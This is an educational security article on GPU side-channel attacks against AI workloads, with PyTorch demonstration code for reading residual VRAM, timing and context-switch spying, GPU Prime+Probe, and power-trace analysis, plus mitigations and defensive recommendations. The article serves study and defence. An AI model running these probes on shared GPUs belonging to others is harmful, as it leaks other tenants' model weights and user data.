GPU Memory Side-Channel Attacks
Side-channel attacks exploiting GPU memory allocation, timing, and electromagnetic emanation to extract sensitive data from AI workloads.
Overview
GPUs were designed for parallel computation, not for multi-tenant security isolation. Unlike CPUs, which have decades of refinement in memory protection (virtual memory, page tables, protection rings), GPU memory management is fundamentally simpler. NVIDIA GPUs use a unified VRAM pool that is managed by the CUDA driver, and the isolation guarantees depend on the sharing mode (exclusive, time-sliced, MPS, or MIG).
This creates side-channel opportunities that do not exist on CPUs. When GPU memory is allocated and freed, the data persists in VRAM until overwritten. When multiple workloads share a GPU, timing differences in memory operations leak information about other workloads. Even physical side channels — power consumption and electromagnetic emanation — carry information about the computations being performed on the GPU.
These side channels are directly relevant to AI security because AI workloads process sensitive data: model weights (intellectual property), inference inputs (user data, business queries), and training data (which may include PII, medical records, or financial data). This article covers the known GPU side-channel attack classes, provides practical demonstration code, and evaluates the effectiveness of available mitigations.
The attacks described here draw on research including Naghibijouybari et al., "Rendered Insecure: GPU Side Channel Attacks are Practical" (IEEE S&P 2018), and Wei et al., "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020).
GPU Memory Architecture
VRAM Management
NVIDIA GPUs manage VRAM through the CUDA driver, which allocates memory in blocks. Unlike CPU virtual memory, GPU memory allocation does not zero-initialize by default in all contexts. The CUDA runtime's cudaMalloc does not guarantee that allocated memory is cleared, meaning newly allocated buffers may contain data from previous allocations.
import torch
import numpy as np
from typing import Dict, List, Optional, Tuple
class GPUMemoryResidualScanner:
"""
Scan GPU memory for residual data from previous workloads.
Demonstrates the GPU memory residual side channel.
"""
def __init__(self, device: str = "cuda:0"):
self.device = torch.device(device)
if not torch.cuda.is_available():
raise RuntimeError("CUDA is not available")
def allocate_and_scan(
self,
size_mb: int = 256,
num_blocks: int = 10,
) -> List[Dict]:
"""
Allocate GPU memory blocks and check for non-zero residual data.
This demonstrates that GPU memory may contain data from previous
allocations by other processes on the same GPU.
"""
findings = []
for i in range(num_blocks):
# Allocate without initialization
num_elements = (size_mb * 1024 * 1024) // 4 # float32 = 4 bytes
try:
# Use empty (not zeros) to avoid initialization
tensor = torch.empty(num_elements, dtype=torch.float32, device=self.device)
# Check for non-zero values (residual data)
non_zero_count = torch.count_nonzero(tensor).item()
non_zero_ratio = non_zero_count / num_elements
# Statistical analysis of residual data
if non_zero_count > 0:
non_zero_values = tensor[tensor != 0]
findings.append({
"block": i,
"size_mb": size_mb,
"non_zero_count": non_zero_count,
"non_zero_ratio": non_zero_ratio,
"sample_values": non_zero_values[:10].cpu().tolist(),
"min_value": non_zero_values.min().item(),
"max_value": non_zero_values.max().item(),
"finding": "RESIDUAL_DATA_FOUND",
})
else:
findings.append({
"block": i,
"size_mb": size_mb,
"non_zero_count": 0,
"finding": "CLEAN",
})
del tensor
torch.cuda.empty_cache()
except torch.cuda.OutOfMemoryError:
findings.append({
"block": i,
"finding": "OOM — could not allocate",
})
return findings
def scan_for_model_weights(
self, size_mb: int = 512
) -> Dict:
"""
Attempt to detect residual model weight patterns in GPU memory.
Model weights typically follow specific statistical distributions
(approximately normal for transformer layers).
"""
num_elements = (size_mb * 1024 * 1024) // 4
tensor = torch.empty(num_elements, dtype=torch.float32, device=self.device)
non_zero = tensor[tensor != 0]
if len(non_zero) == 0:
return {"found": False, "detail": "No residual data"}
# Check if the distribution looks like model weights
mean = non_zero.mean().item()
std = non_zero.std().item()
kurtosis_val = ((non_zero - mean) ** 4).mean().item() / (std ** 4) - 3
looks_like_weights = (
abs(mean) < 0.5 # Weights are typically near zero
and 0.001 < std < 1.0 # Reasonable weight scale
and abs(kurtosis_val) < 10 # Not too heavy-tailed
)
del tensor
torch.cuda.empty_cache()
return {
"found": looks_like_weights,
"statistics": {
"mean": mean,
"std": std,
"kurtosis": kurtosis_val,
"sample_size": len(non_zero),
},
"interpretation": (
"Residual data matches typical model weight distribution"
if looks_like_weights
else "Residual data does not match weight patterns"
),
}Memory Allocation Timing
The time taken to allocate GPU memory depends on the current memory state, which is influenced by other workloads. By measuring allocation timing, an attacker can infer information about co-resident workloads:
import torch
import time
from typing import List, Dict
class GPUTimingSideChannel:
"""
Demonstrate GPU memory timing side channels.
Allocation and computation timing varies based on co-resident workloads.
"""
def __init__(self, device: str = "cuda:0"):
self.device = torch.device(device)
def measure_allocation_timing(
self,
sizes_mb: List[int] = None,
num_samples: int = 100,
) -> List[Dict]:
"""
Measure GPU memory allocation timing at various sizes.
Timing variations can reveal co-resident workload activity.
"""
if sizes_mb is None:
sizes_mb = [1, 10, 50, 100, 500]
results = []
for size_mb in sizes_mb:
num_elements = (size_mb * 1024 * 1024) // 4
timings = []
for _ in range(num_samples):
torch.cuda.synchronize()
start = time.perf_counter_ns()
try:
t = torch.empty(num_elements, dtype=torch.float32, device=self.device)
torch.cuda.synchronize()
elapsed_ns = time.perf_counter_ns() - start
timings.append(elapsed_ns)
del t
torch.cuda.empty_cache()
except torch.cuda.OutOfMemoryError:
break
if timings:
results.append({
"size_mb": size_mb,
"mean_ns": sum(timings) / len(timings),
"min_ns": min(timings),
"max_ns": max(timings),
"std_ns": (
sum((t - sum(timings)/len(timings))**2 for t in timings) / len(timings)
) ** 0.5,
"samples": len(timings),
})
return results
def measure_inference_timing(
self,
model: torch.nn.Module,
input_sizes: List[Tuple[int, ...]],
num_samples: int = 50,
) -> List[Dict]:
"""
Measure inference timing across different input sizes.
Timing reveals information about model architecture.
"""
model.eval()
results = []
for input_size in input_sizes:
timings = []
for _ in range(num_samples):
x = torch.randn(*input_size, device=self.device)
# Warm up
with torch.no_grad():
_ = model(x)
torch.cuda.synchronize()
# Measure
start = time.perf_counter_ns()
with torch.no_grad():
_ = model(x)
torch.cuda.synchronize()
elapsed_ns = time.perf_counter_ns() - start
timings.append(elapsed_ns)
del x
results.append({
"input_size": input_size,
"mean_us": sum(timings) / len(timings) / 1000,
"std_us": (
sum((t - sum(timings)/len(timings))**2 for t in timings) / len(timings)
) ** 0.5 / 1000,
"samples": len(timings),
})
return resultsContext-Switching Side Channels
Time-Sliced GPU Sharing
When multiple processes share a GPU via time-slicing (the default on consumer GPUs and many cloud instances), the GPU switches context between processes. Each context switch causes measurable performance interference.
Wei et al. demonstrated in "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020) that by running a spy process that monitors its own performance during context switches, an attacker can infer:
- Whether a neural network is running on the shared GPU
- The model architecture (number of layers, layer types)
- The input data properties (image dimensions, batch size)
import torch
import time
from typing import Dict, List
class ContextSwitchSpy:
"""
Monitor GPU context switching to infer co-resident workload properties.
Based on concepts from Wei et al. (IEEE DSN 2020).
"""
def __init__(self, device: str = "cuda:0"):
self.device = torch.device(device)
def run_spy_kernel(
self,
duration_seconds: float = 5.0,
probe_size: int = 1024,
) -> List[Dict]:
"""
Run a continuous probe kernel and measure timing variations.
Timing spikes indicate GPU context switches to other workloads.
"""
probe = torch.randn(probe_size, probe_size, device=self.device)
measurements = []
start_time = time.perf_counter()
while time.perf_counter() - start_time < duration_seconds:
torch.cuda.synchronize()
op_start = time.perf_counter_ns()
# Simple matrix multiply as timing probe
result = torch.mm(probe, probe)
torch.cuda.synchronize()
op_end = time.perf_counter_ns()
elapsed_ns = op_end - op_start
measurements.append({
"timestamp_ns": op_start,
"duration_ns": elapsed_ns,
})
del result
# Analyze timing variations
durations = [m["duration_ns"] for m in measurements]
mean_duration = sum(durations) / len(durations)
threshold = mean_duration * 2 # Context switch causes >2x slowdown
context_switches = [
m for m in measurements if m["duration_ns"] > threshold
]
return {
"total_probes": len(measurements),
"mean_duration_ns": mean_duration,
"context_switches_detected": len(context_switches),
"switch_ratio": len(context_switches) / len(measurements) if measurements else 0,
"interpretation": (
"Co-resident GPU workload detected"
if len(context_switches) > len(measurements) * 0.05
else "No significant co-resident activity detected"
),
}
def infer_layer_structure(
self,
measurements: List[Dict],
expected_layer_duration_us: float = 100,
) -> Dict:
"""
Attempt to infer neural network layer structure from timing patterns.
Different layer types (conv, attention, linear) have characteristic timing signatures.
"""
# Group context switch gaps into clusters that may correspond to layers
durations = [m["duration_ns"] for m in measurements]
mean_d = sum(durations) / len(durations)
# Find timing pattern periodicity
anomalies = []
for i, d in enumerate(durations):
if d > mean_d * 1.5:
anomalies.append(i)
if len(anomalies) < 2:
return {"inference_possible": False, "reason": "Insufficient anomaly data"}
# Calculate intervals between anomalies
intervals = [
anomalies[i+1] - anomalies[i]
for i in range(len(anomalies) - 1)
]
# Look for periodicity (suggesting repeated layer execution)
if intervals:
mean_interval = sum(intervals) / len(intervals)
interval_std = (
sum((i - mean_interval)**2 for i in intervals) / len(intervals)
) ** 0.5
periodic = interval_std / mean_interval < 0.3 if mean_interval > 0 else False
return {
"inference_possible": True,
"anomaly_count": len(anomalies),
"mean_interval": mean_interval,
"periodic": periodic,
"estimated_layers": len(anomalies) if periodic else "unknown",
"interpretation": (
f"Detected periodic pattern suggesting ~{len(anomalies)} layer executions"
if periodic
else "Detected activity but could not determine layer structure"
),
}
return {"inference_possible": False, "reason": "No clear pattern"}Cache-Based Side Channels
GPU Cache Contention
Modern GPUs have L1 and L2 caches. In shared GPU environments, cache contention between workloads creates observable timing differences:
import torch
import time
from typing import Dict, List
class GPUCacheSideChannel:
"""
Demonstrate GPU cache-based side channels.
Cache contention from co-resident workloads causes measurable timing variations.
"""
def __init__(self, device: str = "cuda:0"):
self.device = torch.device(device)
def prime_and_probe(
self,
array_size: int = 4 * 1024 * 1024, # 4M elements ~= 16MB at float32
num_rounds: int = 100,
) -> Dict:
"""
GPU adaptation of Prime+Probe cache side channel.
1. Prime: Fill GPU cache with known data
2. Wait: Allow victim to execute (displacing some cache lines)
3. Probe: Measure access time to our cached data
Cache lines displaced by the victim will be slower to access.
"""
# Create a large array that fills the L2 cache
probe_array = torch.randn(array_size, dtype=torch.float32, device=self.device)
access_pattern = torch.randperm(array_size, device=self.device)[:1024]
baseline_times = []
probe_times = []
for round_idx in range(num_rounds):
# PRIME: Access all elements to fill cache
torch.cuda.synchronize()
_ = probe_array.sum()
torch.cuda.synchronize()
# PROBE (baseline — no victim activity between prime and probe)
start = time.perf_counter_ns()
_ = probe_array[access_pattern].sum()
torch.cuda.synchronize()
baseline_time = time.perf_counter_ns() - start
baseline_times.append(baseline_time)
# PRIME again
_ = probe_array.sum()
torch.cuda.synchronize()
# Small delay to allow potential co-resident activity
time.sleep(0.001)
# PROBE again (after potential victim activity)
start = time.perf_counter_ns()
_ = probe_array[access_pattern].sum()
torch.cuda.synchronize()
probe_time = time.perf_counter_ns() - start
probe_times.append(probe_time)
mean_baseline = sum(baseline_times) / len(baseline_times)
mean_probe = sum(probe_times) / len(probe_times)
return {
"rounds": num_rounds,
"mean_baseline_ns": mean_baseline,
"mean_probe_ns": mean_probe,
"timing_difference_ns": mean_probe - mean_baseline,
"cache_contention_detected": mean_probe > mean_baseline * 1.2,
"contention_ratio": mean_probe / mean_baseline if mean_baseline > 0 else 0,
}Power and Electromagnetic Side Channels
GPU power consumption correlates with computational activity. Research has shown that power traces can reveal:
- Whether the GPU is performing matrix multiplication (training/inference) vs. memory operations
- The size of the matrices being computed
- Potentially, the values being processed (in extreme cases with high-resolution measurements)
These attacks require physical access to power measurement points or electromagnetic probes near the GPU, making them relevant primarily for:
- Shared physical infrastructure (colocation data centers)
- Edge AI devices where an attacker has physical access
- Supply chain attacks where monitoring hardware is implanted
from typing import Dict, List, Optional
from dataclasses import dataclass
@dataclass
class PowerMeasurement:
"""Simulated GPU power measurement data point."""
timestamp_us: float
power_watts: float
gpu_utilization_pct: float
class PowerSideChannelAnalyzer:
"""
Analyze GPU power consumption traces for information leakage.
In practice, power measurements come from:
- nvidia-smi (low resolution, ~1 second)
- NVML API (higher resolution, ~100ms)
- External power meters (highest resolution)
"""
def analyze_power_trace(
self,
measurements: List[PowerMeasurement],
) -> Dict:
"""Analyze a power consumption trace for patterns."""
if not measurements:
return {"analysis": "no_data"}
powers = [m.power_watts for m in measurements]
timestamps = [m.timestamp_us for m in measurements]
# Detect computation phases
mean_power = sum(powers) / len(powers)
phases = []
current_phase = "idle" if powers[0] < mean_power else "active"
phase_start = 0
for i in range(1, len(powers)):
new_phase = "idle" if powers[i] < mean_power * 0.8 else "active"
if new_phase != current_phase:
phases.append({
"type": current_phase,
"start_idx": phase_start,
"end_idx": i,
"duration_us": timestamps[i] - timestamps[phase_start],
"mean_power": sum(powers[phase_start:i]) / (i - phase_start),
})
current_phase = new_phase
phase_start = i
active_phases = [p for p in phases if p["type"] == "active"]
return {
"total_measurements": len(measurements),
"mean_power_watts": mean_power,
"max_power_watts": max(powers),
"min_power_watts": min(powers),
"computation_phases": len(active_phases),
"phase_details": active_phases[:10],
"interpretation": (
f"Detected {len(active_phases)} computation phases — "
"may correspond to model layers or inference batches"
),
}
def detect_model_architecture_from_power(
self, phases: List[Dict]
) -> Dict:
"""
Attempt to infer model architecture from power consumption patterns.
Different layer types have characteristic power signatures.
"""
if len(phases) < 3:
return {"inference_possible": False}
# Attention layers: high power, longer duration
# Linear layers: moderate power, shorter duration
# Normalization: low power, very short duration
layer_classifications = []
for phase in phases:
power = phase.get("mean_power", 0)
duration = phase.get("duration_us", 0)
if power > 250 and duration > 1000:
layer_classifications.append("attention_or_matmul")
elif power > 150 and duration > 500:
layer_classifications.append("linear")
elif duration < 200:
layer_classifications.append("normalization_or_activation")
else:
layer_classifications.append("unknown")
return {
"inference_possible": True,
"estimated_layers": len(layer_classifications),
"layer_types": layer_classifications,
"attention_layers": layer_classifications.count("attention_or_matmul"),
"linear_layers": layer_classifications.count("linear"),
}Mitigations
Software Mitigations
import torch
from typing import Optional
class GPUSideChannelMitigation:
"""Software mitigations for GPU side-channel attacks."""
@staticmethod
def secure_allocate(
size: tuple,
dtype: torch.dtype = torch.float32,
device: str = "cuda:0",
) -> torch.Tensor:
"""Allocate GPU memory and zero-initialize it to prevent residual data leakage."""
tensor = torch.zeros(size, dtype=dtype, device=torch.device(device))
return tensor
@staticmethod
def secure_deallocate(tensor: torch.Tensor) -> None:
"""Securely deallocate a tensor by overwriting with zeros before freeing."""
if tensor.is_cuda:
tensor.zero_()
torch.cuda.synchronize()
del tensor
torch.cuda.empty_cache()
@staticmethod
def add_timing_noise(
min_delay_ms: float = 0.1,
max_delay_ms: float = 1.0,
) -> None:
"""
Add random timing noise to inference operations.
Makes timing side channels less reliable.
"""
import random
delay = random.uniform(min_delay_ms, max_delay_ms) / 1000
time.sleep(delay)
@staticmethod
def constant_time_inference(
model: torch.nn.Module,
input_tensor: torch.Tensor,
fixed_duration_ms: float = 100,
) -> torch.Tensor:
"""
Execute inference and pad to a fixed duration.
Prevents timing side channels by making all inferences take the same time.
"""
start = time.perf_counter()
with torch.no_grad():
output = model(input_tensor)
torch.cuda.synchronize()
elapsed_ms = (time.perf_counter() - start) * 1000
remaining_ms = fixed_duration_ms - elapsed_ms
if remaining_ms > 0:
time.sleep(remaining_ms / 1000)
return outputHardware Mitigations
| Mitigation | Effectiveness | Performance Impact | Availability |
|---|---|---|---|
| MIG (Multi-Instance GPU) | High — hardware isolation | Reduces per-instance compute | A100, H100 |
| NVIDIA Confidential Computing | Very High — encrypted GPU memory | 5-15% overhead | H100 |
| GPU Memory Scrubbing | Medium — removes residuals | Adds allocation latency | Software-configurable |
| Separate GPU per workload | Complete — no sharing | Expensive | Any GPU |
| IOMMU | Medium — prevents DMA attacks | Minimal | CPU/chipset dependent |
Defensive Recommendations
- Use MIG for multi-tenant GPU environments to achieve hardware-enforced memory isolation
- Zero-initialize GPU memory on allocation to prevent residual data leakage
- Zero-fill GPU memory before freeing sensitive tensors
- Use NVIDIA Confidential Computing (H100) for sensitive inference workloads
- Avoid GPU time-slicing for security-sensitive workloads — use dedicated GPUs or MIG instances
- Add timing noise to inference operations to defeat timing side channels
- Monitor GPU power consumption for anomalous patterns that may indicate side-channel attacks
- Enable IOMMU to prevent DMA-based memory access from compromised GPU workloads
References
- Naghibijouybari et al. — "Rendered Insecure: GPU Side Channel Attacks are Practical" (IEEE S&P 2018) — foundational GPU side channel research
- Wei et al. — "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020) — model architecture inference from context switching
- Zhu et al. — "Hermes Attack: Steal DNN Models with Lossless Inference Accuracy" (USENIX Security 2021) — model extraction via GPU side channels
- NVIDIA Multi-Instance GPU — https://docs.nvidia.com/datacenter/tesla/mig-user-guide/
- NVIDIA Confidential Computing — https://developer.nvidia.com/confidential-computing
- MITRE ATLAS — AML.T0024 (Exfiltration via ML Inference API)